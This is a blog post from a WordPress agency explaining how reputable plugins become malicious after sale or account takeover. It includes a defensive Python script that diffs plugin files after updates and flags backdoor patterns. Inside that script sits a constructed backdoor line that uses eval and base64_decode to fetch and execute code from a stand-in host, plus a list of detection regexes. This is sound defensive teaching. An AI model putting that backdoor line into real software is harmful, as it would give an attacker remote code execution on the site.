Even Good WordPress Plugins Can Become Malicious

You go to all the trouble of finding high quality plugins from reputable authors (or from the WordPress plugin repository) for your website, and suddenly you find you’ve been hacked.

“How can it be?” you ask yourself.

One possible reason is that, somehow, that carefully chosen ‘good’ plugin has gone bad.

Let’s look at some reasons that good plugins go bad:

How do ‘good’ plugins go bad?

I’ve linked to an article at the end of this post that goes into explicit detail. It’s long and reasonably technical reading, especially if you’re not into the technical stuff, so here’s the translation:

Basically, good plugins can go bad for two reasons:

  1. The plugin author sells (or gives away) the plugin, and a bad guy gets hold of it along with the right to publish new versions.
  2. A bad guy gets himself added as an owner (committer) of the plugin in the WordPress repository, which lets him edit the code and publish a new version under the plugin’s existing, trusted name.

Once the malicious code has been added to the plugin, a new version is published. This triggers the normal ‘update available’ notification, and site owners who click update (or who have automatic plugin updates switched on) load the malicious code onto their website with the new version, exactly as they would a legitimate one.

In the incident described in the article I’ve linked to below, the compromised plugin (Custom Content Type Manager, or CCTM) sent information about the site and its users back to the hacker’s server, and it created a backdoor into the site.

And as site owners running the CCTM plugin updated it, the hacker built up a list of compromised sites that he could exploit at leisure.
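The practical defence against this kind of update is to know exactly what an update changed. The script below is an added example (it is not code from the original article, from Sucuri or from WordPress): it records a SHA-256 baseline of a plugin directory after a vetted install, diffs the directory again after an update, and then reads only the new or changed files for the usual backdoor tell-tales (eval, base64_decode, remote fetches and the like). The plugin name, its files and the ‘malicious update’ are all constructed inline so it runs offline; the indicator list is an assumption, not a definitive signature set.

```python
"""Baseline-and-diff integrity check for a WordPress plugin directory.

Added example; not code from the original article or from Sucuri/WordPress.
The plugin files, the baseline and the 'malicious update' are constructed
inline so the script runs offline.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Crude indicators of the kind of code a backdoored update tends to carry.
# Legitimate plugins use some of these too, so a hit is a prompt to read
# the file, not proof of compromise. (Assumed list, not an official one.)
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "gzinflate": re.compile(r"\bgzinflate\s*\("),
    "shell exec": re.compile(r"\b(system|exec|shell_exec|passthru)\s*\("),
    "remote fetch": re.compile(
        r"(file_get_contents|curl_init|wp_remote_(get|post))\s*\(\s*['\"]https?://"),
}


def hash_tree(root: Path) -> dict:
    """Map every file under root (relative POSIX path) to its SHA-256 hex digest."""
    manifest = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifest(baseline: dict, current: dict) -> dict:
    """Report files that appeared, vanished or changed since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(f for f in baseline.keys() & current.keys()
                           if baseline[f] != current[f]),
    }


def scan_for_indicators(root: Path, files) -> list:
    """Return (file, indicator name) pairs for each file that matches an indicator."""
    hits = []
    for rel in files:
        text = (root / rel).read_text(errors="replace")
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.append((rel, name))
    return hits


def demo() -> dict:
    """Constructed scenario: baseline a clean plugin, then apply a tampered update."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = Path(tmp) / "example-plugin"   # hypothetical plugin, not a real one
        (plugin / "inc").mkdir(parents=True)
        (plugin / "example-plugin.php").write_text(
            "<?php\n/* Plugin Name: Example Plugin (constructed) */\n"
            "function ex_init() { add_action('init', 'ex_register'); }\n")
        (plugin / "inc" / "helpers.php").write_text(
            "<?php\nfunction ex_register() { return true; }\n")
        baseline = hash_tree(plugin)   # in practice, store this after a vetted install

        # Simulated malicious update (constructed): the main file now pulls in a
        # new file that executes whatever a remote server sends back.
        (plugin / "example-plugin.php").write_text(
            "<?php\n/* Plugin Name: Example Plugin (constructed) */\n"
            "function ex_init() { add_action('init', 'ex_register'); }\n"
            "require_once __DIR__ . '/inc/cache.php';\n")
        (plugin / "inc" / "cache.php").write_text(
            "<?php\n// constructed backdoor stand-in for the demo\n"
            "eval(base64_decode(file_get_contents('http://example.invalid/p')));\n")

        changes = diff_manifest(baseline, hash_tree(plugin))
        # Only new or changed files need reading; untouched files were already vetted.
        hits = scan_for_indicators(plugin, changes["added"] + changes["modified"])
        return {"changes": changes, "indicators": hits}


if __name__ == "__main__":
    report = demo()
    for kind, files in report["changes"].items():
        print(f"{kind:9}: {files}")
    for rel, name in report["indicators"]:
        print(f"indicator in {rel}: {name}")
```

Run the baseline step against `wp-content/plugins/<plugin>` straight after you have checked a plugin, and the diff step before you trust any update. Note the limit of checksum tools such as WP-CLI’s `wp plugin verify-checksums`: they confirm that your files match what WordPress.org is serving, which is exactly what a malicious version published through the repository will also match, so they catch tampering after install, not a bad release. A local baseline diff tells you what the update actually changed, which is the question that matters here.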

Most of the rest of that article traces the investigation they went through at Sucuri to identify the hack and the hacker, so if you’re curious you can get all the details there (link is below).


As is always the case in any area of security enforcement, the hackers are one step ahead (many years ago I managed the credit authorisation operation for American Express in the UK, and I learnt then that the bad guys are always one step ahead!).

So you cannot relax your vigilance.

Certainly you should only install plugins from reputable authors or from the WordPress repository but, since even these can go bad, you must also keep a current, clean backup of your entire website, and keep enough history that you still have a copy taken before the bad update went in.

The surest and quickest way of repairing a hacked website is to delete it entirely and restore it from a clean backup. One caveat: a restore puts the old version of the plugin back, and the ‘update available’ notice will reappear. Don’t update that plugin again until the author or the WordPress plugin team has published a clean version; if in doubt, remove the plugin altogether.

I receive notifications of new security risks affecting WordPress websites each day from two sources – Sucuri and the WPScan Vulnerability Database – so Abledragon is able to react very quickly if a problem is found which affects your website. Details of our security monitoring service can be found here.

The full article setting out the details I’ve referred to above can be found here.

And if you have any questions about security on WordPress websites, please get in touch.

Stay vigilant!

Martin Malden

About the author: Martin Malden owns Abledragon, a WordPress agency that was established in 2009. Today it serves customers in Hong Kong, Australia and the UK. Abledragon websites are built for today’s Internet, with the mobile user in mind, and are known for security and speed.